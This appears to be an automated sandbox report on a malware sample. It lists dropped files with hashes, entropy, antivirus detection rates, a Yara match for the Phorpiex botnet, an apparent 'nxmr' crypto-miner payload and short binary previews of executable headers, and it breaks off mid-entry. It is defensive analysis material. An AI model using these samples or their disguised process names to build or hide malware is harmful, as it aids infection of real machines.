                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.pj)..9)..9)..9 ..9...9Q..8+..9..C9+..9..A9(..9...9+..9..s9-..9)..9...9..e9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L......g.....................p......@y............@..........................p..............................................|0.......................................................................................................................text............................... ..`.rdata...?.......@..................@..@.data........@.......2..............@...................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\2[2]

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8960
                                                                                                                                                                                                    Entropy (8bit):7.980118959451248
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:8w3f/H9pFkeMpRmPIlHDCEkAH5gWPmEt3TXxl/6LkbgewuNvm:8snHrUVjbHH5g+mEt3z64bdNvm
                                                                                                                                                                                                    MD5:39F45EDB23427EBF63197CA138DDB282
                                                                                                                                                                                                    SHA1:4BE1B15912C08F73687C0E4C74AF0979C17FF7D5
                                                                                                                                                                                                    SHA-256:77FBB0D8630024634880C37DA59CE57D1B38C7E85BDCC14C697DB9E79C24E0DE
                                                                                                                                                                                                    SHA-512:410F6BAAD25B256DAEBFA5D8B8A495429C9E26E7DE767B2A0E6E4A75E543B77DBD0ABCA0335FB1F0D91E49E292B42CEDC6EDD72D25A3C4C62330E2B31C054CC6
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:$.g.r5].F.M[..o.I.........5.Eb....L6,.i%.kZ.....8....ePI|.....<..iq....#.......O@5..U|*{`)...].H........x..-..dR~A.}"2......... +.(.*.R.m....d...!..(...$..5.t...F.]...<.g"...V.(1}.]C........s3..76..&...Ic...%t..h.I.b.....R(......}..IE...<.....]..C.....9....xi|........../.....>y..4m..3..hO.....;...<.|..5.,.0.tA`.J..Nn;.w.es...q.T.._...:<....fb7..J.H.3&. ...f..1.F.G.c..&k..,J..x+..c.`.w....s....~.........(s..F..IT...,....5\.).}..-..@........4.>a.u...e.\..v.=.I.kB..[..Q...2..c.LA.lT..rO.....U.Y..*m.j#.u...U..P...>.Y{,...Tk....3.h.,v..)..P.TK3_.+..+....m..NP[..qe.......G9.f..|........[.-&M~&..14w.._.l.a./.ok...w.M.._...w..^7Rgg....%.Tv...}....T..p...;d.Su..z.FPH...Z....I...pz5...0g..`..l..K\V3...t..r.y.l...2..R.]?cz.m....v....o.......\. ....0.o.N3.a.P..V.=BE\..... _.^hV.f.\*..n.$0..q.C........7..BQ.n...}c..../.Yd=.G...-.....T.Sx..&...z.wi...:...,.a..........o.ou....Hn...8....Zx...............F^=R...nU.T.D9.'.W..L.dPi.^`ZBj..2.....z.\.

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\4[1]

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):10496
                                                                                                                                                                                                    Entropy (8bit):7.984469394998947
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:aAnkxbr7XNTQwFtSiiFh1eBtpQ9dys4Hcbnvsi3i9FS0swDNC6:aAkxbre0gBFh1xdyCjzWd
                                                                                                                                                                                                    MD5:2266F0AECD351E1B4092E82B941211EA
                                                                                                                                                                                                    SHA1:1DCED8D943494AA2BE39CA28C876F8F736C76EF1
                                                                                                                                                                                                    SHA-256:CBBAD0AB02CD973C9C4E73336E3BCD0849AEB2232A7BDBC38F0B50696B5C28C3
                                                                                                                                                                                                    SHA-512:6691CD697BBE7F7A03D9DE33869AAB289D0A1438B4EE194D2047DED957A726B1D3FE93F08E4A0C677018B20E2521AEB021AB1DC4D1A67927604829DDFD9D59AA
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:..|.@vC)...q.9....K.{>...d8..'.s.....J.......Pn..k.V.z...@W....L{..uG.'G1.CL..@...<B..6..;.>hM..\..|w.B.v.....u.g...OX.%. .h.r9:|....s..<.6.).g..4GlY...2Bf.5...A..+G....(.T-oE..Z.I23.{..'3...)`...^e7jz/M$s......4....*16..m..frn..DD,......Wa(.2.D..9...........x..........Zk4Da...)?.._h...sA..W.....B2.....cHQ.T....=..U...@.3.}....!...Y.G.C...X{... 4"...&..h.0..'xu..#.c.|g...L0....)...c..M...]....oL{...:En:?.|_X.P.........Q@. .3...o.....).u..a..[...I...+....f....Z.M..%. ].2.uz._......Gw....t.0b........Fa....MT.d..2.Y....&....T............M..X...P......}..+.....Op..Q.E.o6R;.P..>8`2.'".....~C..Z_.........,.2g.. $..l....."x...:.h;..H...........`.$-6....._-e...C?.6T..=..q...L...3.&fG)..W..G..@6.X~.%X....%R...C.h..?R...]......f...bU!.PH..h...".......R...j,d.k......e..\....~.h..n(.....,.G...<...u.1....6t......l.....w;..p..;y..rSC....._.M....6.X....h..t.G7zs..HP,e_d.d.c.n..^.M+ct\0j.r.>;......_n.q.>.x.e.z...w...o...%kkw..Fg..A/.cS..Q./=cj.

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\1[1]

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):110600
                                                                                                                                                                                                    Entropy (8bit):7.998486619051527
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:LFQC4AbS79Bo0bTtS3v4P09loyBE7QXNn8IJrF:LFQC4A+7jfiw8HoyYQXdXF
                                                                                                                                                                                                    MD5:1FCB78FB6CF9720E9D9494C42142D885
                                                                                                                                                                                                    SHA1:FEF9C2E728AB9D56CE9ED28934B3182B6F1D5379
                                                                                                                                                                                                    SHA-256:84652BB8C63CA4FD7EB7A2D6EF44029801F3057AA2961867245A3A765928DD02
                                                                                                                                                                                                    SHA-512:CDF58E463AF1784AEA86995B3E5D6B07701C5C4095E30EC80CC901FFD448C6F4F714C521BF8796FFA8C47538BF8BF5351E157596EFAA7AB88155D63DC33F7DC3
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:NGS!.....8y....j...x9"{[&..TL..,..L.nD..70Ln..MP.B..e...'.LpVJ...g...Y....]...h=....Ot(.P:...jjoF.....2y....:.P@.b...6]u...D\..i4<....Q?......._;]..!.A.4.A......1..c.sa^.+dQ!xl.6Q..8w...a7?..].T%:...H.1....$.j.......4f.k!...p.Fz.v..........?l...5...7...(.....=c.s..c.F.{..-.uE.8.D....QF...|.8.ey.3'.@<Kq.."S.-..?..4.s......S..2..j=.e..Le.....Yh....+...[}AM.,.@...gW\..Z)..ET.../|."...b.W........Ro.......j.(|A,....>.?.1;..>......".&.....;u.c.y..[....t..`...w ..#.....c.dyy...s..G.x_C.h...*I]..D....ey...:.FQ.Q...C.. .B.Z.n.2...@X.&>UY.g..D...YZ.)F.!..F...F...e....h4VGK.>.V......3#+.$.,.&.S...lk..I.F\..C.k$).J._l\.",.0u!.k..T....}.V...!..Y.....B....{}.....nAL...[.Xo[+.1\...m.,.^.bLMD.j.-g...... <._8d+-D./.k<..'.....dv...-.Q...i.`........N4W(._"..%.....5q..844o4..g..d..x....s...i.fc.....D..^..].....M(...A..[...gB4..m.w..AV....@.g..5.4.].....BLr!n*....W.G,6+uY..9U.4..........O..P....&....?.....v.K.i..>X...7Dt...o=.2........f....bi..C.5N.>.7lf.......^..@F.O

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\nxmr[1].exe

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\28849683.exe
                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):5827584
                                                                                                                                                                                                    Entropy (8bit):7.718261688436852
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:98304:ZMknXV8IFUX81qQ6lLYhJ/N0TB4HBDxWcLKamiwPZhsSZLZ1wpxGN:ZBnXV86UiqrlLY/8AW6YZPZf6HGN
                                                                                                                                                                                                    MD5:13B26B2C7048A92D6A843C1302618FAD
                                                                                                                                                                                                    SHA1:89C2DFC01AC12EF2704C7669844EC69F1700C1CA
                                                                                                                                                                                                    SHA-256:1753AD35ECE25AB9A19048C70062E9170F495E313D7355EBBBA59C38F5D90256
                                                                                                                                                                                                    SHA-512:D6AFF89B61C9945002A6798617AD304612460A607EF1CFBDCB32F8932CA648BCEE1D5F2E0321BB4C58C1F4642B1E0ECECC1EB82450FDEC7DFF69B5389F195455
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 76%
                                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                                    • Filename: bBcZoComLl.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: dgiX55cHyU.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: GGXhCiYFBw.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: 0NSjUT34gS.exe, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: 1mqzOM6eok.exe, Detection: malicious, Browse
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f...............&......X................@.............................pY.......Y...`... .............................................. Y.4....PY.......X.X............`Y.0.............................X.(...................."Y.P............................text...P...........................`..`.data.....V.......V.................@....rdata...9....X..:...xX.............@..@.pdata..X.....X.......X.............@..@.xdata........X.......X.............@..@.bss..........Y..........................idata..4.... Y.......X.............@....CRT....`....0Y.......X.............@....tls.........@Y.......X.............@....rsrc........PY.......X.............@....reloc..0....`Y.......X.............@..B........................................................................................................................................................................

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                    Size (bytes):64
                                                                                                                                                                                                    Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:@...e...........................................................

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\1114023610.exe

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):110600
                                                                                                                                                                                                    Entropy (8bit):7.998486619051527
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:LFQC4AbS79Bo0bTtS3v4P09loyBE7QXNn8IJrF:LFQC4A+7jfiw8HoyYQXdXF
                                                                                                                                                                                                    MD5:1FCB78FB6CF9720E9D9494C42142D885
                                                                                                                                                                                                    SHA1:FEF9C2E728AB9D56CE9ED28934B3182B6F1D5379
                                                                                                                                                                                                    SHA-256:84652BB8C63CA4FD7EB7A2D6EF44029801F3057AA2961867245A3A765928DD02
                                                                                                                                                                                                    SHA-512:CDF58E463AF1784AEA86995B3E5D6B07701C5C4095E30EC80CC901FFD448C6F4F714C521BF8796FFA8C47538BF8BF5351E157596EFAA7AB88155D63DC33F7DC3
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Preview:NGS!.....8y....j...x9"{[&..TL..,..L.nD..70Ln..MP.B..e...'.LpVJ...g...Y....]...h=....Ot(.P:...jjoF.....2y....:.P@.b...6]u...D\..i4<....Q?......._;]..!.A.4.A......1..c.sa^.+dQ!xl.6Q..8w...a7?..].T%:...H.1....$.j.......4f.k!...p.Fz.v..........?l...5...7...(.....=c.s..c.F.{..-.uE.8.D....QF...|.8.ey.3'.@<Kq.."S.-..?..4.s......S..2..j=.e..Le.....Yh....+...[}AM.,.@...gW\..Z)..ET.../|."...b.W........Ro.......j.(|A,....>.?.1;..>......".&.....;u.c.y..[....t..`...w ..#.....c.dyy...s..G.x_C.h...*I]..D....ey...:.FQ.Q...C.. .B.Z.n.2...@X.&>UY.g..D...YZ.)F.!..F...F...e....h4VGK.>.V......3#+.$.,.&.S...lk..I.F\..C.k$).J._l\.",.0u!.k..T....}.V...!..Y.....B....{}.....nAL...[.Xo[+.1\...m.,.^.bLMD.j.-g...... <._8d+-D./.k<..'.....dv...-.Q...i.`........N4W(._"..%.....5q..844o4..g..d..x....s...i.fc.....D..^..].....M(...A..[...gB4..m.w..AV....@.g..5.4.].....BLr!n*....W.G,6+uY..9U.4..........O..P....&....?.....v.K.i..>X...7Dt...o=.2........f....bi..C.5N.>.7lf.......^..@F.O

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\1428024550.exe

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\28849683.exe
                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):5827584
                                                                                                                                                                                                    Entropy (8bit):7.718261688436852
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:98304:ZMknXV8IFUX81qQ6lLYhJ/N0TB4HBDxWcLKamiwPZhsSZLZ1wpxGN:ZBnXV86UiqrlLY/8AW6YZPZf6HGN
                                                                                                                                                                                                    MD5:13B26B2C7048A92D6A843C1302618FAD
                                                                                                                                                                                                    SHA1:89C2DFC01AC12EF2704C7669844EC69F1700C1CA
                                                                                                                                                                                                    SHA-256:1753AD35ECE25AB9A19048C70062E9170F495E313D7355EBBBA59C38F5D90256
                                                                                                                                                                                                    SHA-512:D6AFF89B61C9945002A6798617AD304612460A607EF1CFBDCB32F8932CA648BCEE1D5F2E0321BB4C58C1F4642B1E0ECECC1EB82450FDEC7DFF69B5389F195455
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 76%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f...............&......X................@.............................pY.......Y...`... .............................................. Y.4....PY.......X.X............`Y.0.............................X.(...................."Y.P............................text...P...........................`..`.data.....V.......V.................@....rdata...9....X..:...xX.............@..@.pdata..X.....X.......X.............@..@.xdata........X.......X.............@..@.bss..........Y..........................idata..4.... Y.......X.............@....CRT....`....0Y.......X.............@....tls.........@Y.......X.............@....rsrc........PY.......X.............@....reloc..0....`Y.......X.............@..B........................................................................................................................................................................

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\15714163.exe

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):13312
                                                                                                                                                                                                    Entropy (8bit):5.259790062623363
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:0iBbxFJyyHpXQE+FJx34ymFpQ9999999999999999999999999999999999999KI:XxF0yHR+Foy
                                                                                                                                                                                                    MD5:5A0D146F7A911E98DA8CC3C6DE8ACABF
                                                                                                                                                                                                    SHA1:4EC56B14A08C897A5E9E85F5545B6C976A0BE3C1
                                                                                                                                                                                                    SHA-256:BF61E77B7C49CE3346A28D8BC084C210618EA6EC5F3CFA9AE8F4AA4D64E145F1
                                                                                                                                                                                                    SHA-512:6D1526A5F467535D51B7F9B3A7AF2D54512526E2523E3048082277B83B6E1A1F0D7E3C617405898F240AE84A16163BC47886D8541A016B31C51DFADF9DA713E1
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 55%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,CE.B.E.B.E.B.b.9.M.B.L...F.B.E.C.u.B.L...D.B.L...P.B.L...F.B.L...D.B.RichE.B.................PE..L......g.....................&......_........ ....@..........................p............@.................................<#..x....P.......................`..`...................................p"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...4....0......................@....rsrc........P......................@..@.reloc.......`.......2..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\2573513776.exe

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):15872
                                                                                                                                                                                                    Entropy (8bit):5.151089744220859
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:M2moXxWtTFRyGMdMdMdMdMdMdMdMdMP/F2:MJoi6g
                                                                                                                                                                                                    MD5:0C37EE292FEC32DBA0420E6C94224E28
                                                                                                                                                                                                    SHA1:012CBDDDADDAB319A4B3AE2968B42950E929C46B
                                                                                                                                                                                                    SHA-256:981D724FEEBC36777E99513DC061D1F009E589F965C920797285C46D863060D1
                                                                                                                                                                                                    SHA-512:2B60B571C55D0441BA0CFC695F9DB5CD12660EBEC7EFFC7E893C3B7A1C6CB6149DF487C31B8D748697E260CBC4AF29331592B705EA9638F64A711C7A6164628B
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 58%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0..WQ..WQ..WQ..p...]Q..^)S.TQ..WQ..jQ..^)U.UQ..^)C.BQ..^)D.TQ..^)Q.VQ..RichWQ..........................PE..L......f..................................... ....@..........................p......xn....@..................................&..x....P.......................`..x....................................&..@............ ...............................text...d........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........P.......6..............@..@.reloc.. ....`.......:..............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\28849683.exe

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):10240
                                                                                                                                                                                                    Entropy (8bit):5.134070469138298
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:vdHiIV5H6c10lqo9ZYAoQdVDCcJ+587tG6AuJxGE9btz2qhRC7tCEOhd1Q:vdHiQ5HV1wr9KA/J+izJxTZtzthyOhd
                                                                                                                                                                                                    MD5:96509AB828867D81C1693B614B22F41D
                                                                                                                                                                                                    SHA1:C5F82005DBDA43CEDD86708CC5FC3635A781A67E
                                                                                                                                                                                                    SHA-256:A9DE2927B0EC45CF900508FEC18531C04EE9FA8A5DFE2FC82C67D9458CF4B744
                                                                                                                                                                                                    SHA-512:FF603117A06DA8FB2386C1D2049A5896774E41F34D05951ECD4E7B5FC9DA51A373E3FCF61AF3577FF78490CF898471CE8E71EAE848A12812FE98CD7E76E1A9CA
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 76%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......k.Y/.../.../...&.`.-...&.f.....&.p.:....k..".../.......&.w.,...&.b.....Rich/...................PE..L...'V.f..................................... ....@..........................`.......e....@.................................<$.......@.......................P......................................x#..@............ ...............................text............................... ..`.rdata..,.... ......................@..@.data........0......................@....rsrc........@....... ..............@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\415511255.exe

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):110600
                                                                                                                                                                                                    Entropy (8bit):7.998486619051527
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:LFQC4AbS79Bo0bTtS3v4P09loyBE7QXNn8IJrF:LFQC4A+7jfiw8HoyYQXdXF
                                                                                                                                                                                                    MD5:1FCB78FB6CF9720E9D9494C42142D885
                                                                                                                                                                                                    SHA1:FEF9C2E728AB9D56CE9ED28934B3182B6F1D5379
                                                                                                                                                                                                    SHA-256:84652BB8C63CA4FD7EB7A2D6EF44029801F3057AA2961867245A3A765928DD02
                                                                                                                                                                                                    SHA-512:CDF58E463AF1784AEA86995B3E5D6B07701C5C4095E30EC80CC901FFD448C6F4F714C521BF8796FFA8C47538BF8BF5351E157596EFAA7AB88155D63DC33F7DC3
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Preview:NGS!.....8y....j...x9"{[&..TL..,..L.nD..70Ln..MP.B..e...'.LpVJ...g...Y....]...h=....Ot(.P:...jjoF.....2y....:.P@.b...6]u...D\..i4<....Q?......._;]..!.A.4.A......1..c.sa^.+dQ!xl.6Q..8w...a7?..].T%:...H.1....$.j.......4f.k!...p.Fz.v..........?l...5...7...(.....=c.s..c.F.{..-.uE.8.D....QF...|.8.ey.3'.@<Kq.."S.-..?..4.s......S..2..j=.e..Le.....Yh....+...[}AM.,.@...gW\..Z)..ET.../|."...b.W........Ro.......j.(|A,....>.?.1;..>......".&.....;u.c.y..[....t..`...w ..#.....c.dyy...s..G.x_C.h...*I]..D....ey...:.FQ.Q...C.. .B.Z.n.2...@X.&>UY.g..D...YZ.)F.!..F...F...e....h4VGK.>.V......3#+.$.,.&.S...lk..I.F\..C.k$).J._l\.",.0u!.k..T....}.V...!..Y.....B....{}.....nAL...[.Xo[+.1\...m.,.^.bLMD.j.-g...... <._8d+-D./.k<..'.....dv...-.Q...i.`........N4W(._"..%.....5q..844o4..g..d..x....s...i.fc.....D..^..].....M(...A..[...gB4..m.w..AV....@.g..5.4.].....BLr!n*....W.G,6+uY..9U.4..........O..P....&....?.....v.K.i..>X...7Dt...o=.2........f....bi..C.5N.>.7lf.......^..@F.O

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\513318274.exe

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8704
                                                                                                                                                                                                    Entropy (8bit):5.0125514402992275
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:Otk3w0++KjlRC5vVkDlBj9k2cugyJBLCsZ:OEYjlRAGlBj9kSgiLC0
                                                                                                                                                                                                    MD5:CB8420E681F68DB1BAD5ED24E7B22114
                                                                                                                                                                                                    SHA1:416FC65D538D3622F5CA71C667A11DF88A927C31
                                                                                                                                                                                                    SHA-256:5850892F67F85991B31FC90F62C8B7791AFEB3C08AE1877D857AA2B59471A2EA
                                                                                                                                                                                                    SHA-512:BAAABCC4AD5D409267A34ED7B20E4AFB4D247974BFC581D39AAE945E5BF8A673A1F8EACAE2E6783480C8BAAEB0A80D028274A202D456F13D0AF956AFA0110FDF
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 75%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....=d.........."...................... .....@..... .......................`............@...@......@............... ...............................@..(............................................................................................ ..H............text........ ...................... ..`.rsrc...(....@......................@..@.reloc.......`......."..............@..BH........#.......................................................................0..i.......r...pr...p(......&..r...pr...p(......&..(......&.. ....(....~.....(.....((....r:..p(....(......&...(....*....4...................%........(../........<.#_.......0..:.......s.......o......o.....(....o......o......o.....(....&..&..*..........66.......0..\..................rt..p....s.....(.........+6........o....o....r...p(....(...+.2...o....o.......X.......i2............r...p.........(....(.....

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\5232.scr

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\lJ4EzPSKMj.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):85504
                                                                                                                                                                                                    Entropy (8bit):6.394560338648692
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:1536:27zFjdFmav82WoPRgMRmtMJXlXXwfAbQaQG9MF7vRjoJrl:yRyO+oPKjoBAIcZF7vqrl
                                                                                                                                                                                                    MD5:06560B5E92D704395BC6DAE58BC7E794
                                                                                                                                                                                                    SHA1:FBD3E4AE28620197D1F02BFC24ADAF4DDACD2372
                                                                                                                                                                                                    SHA-256:9EAAADF3857E4A3E83F4F78D96AB185213B6528C8E470807F9D16035DAADF33D
                                                                                                                                                                                                    SHA-512:B55B49FC1BD526C47D88FCF8A20FCAED900BFB291F2E3E1186EC196A87127ED24DF71385AE04FEDCC802C362C4EBF38EDFC182013FEBF4496DDEB66CE5195EE3
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                    • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\AppData\Local\Temp\5232.scr, Author: Joe Security
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 82%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.pj)..9)..9)..9 ..9...9Q..8+..9..C9+..9..A9(..9...9+..9..s9-..9)..9...9..e9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L......g.....................p......@y............@..........................p..............................................|0.......................................................................................................................text............................... ..`.rdata...?.......@..................@..@.data........@.......2..............@...................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2g0ovzba.ck4.ps1

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4zdkoxb0.4wm.ps1

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
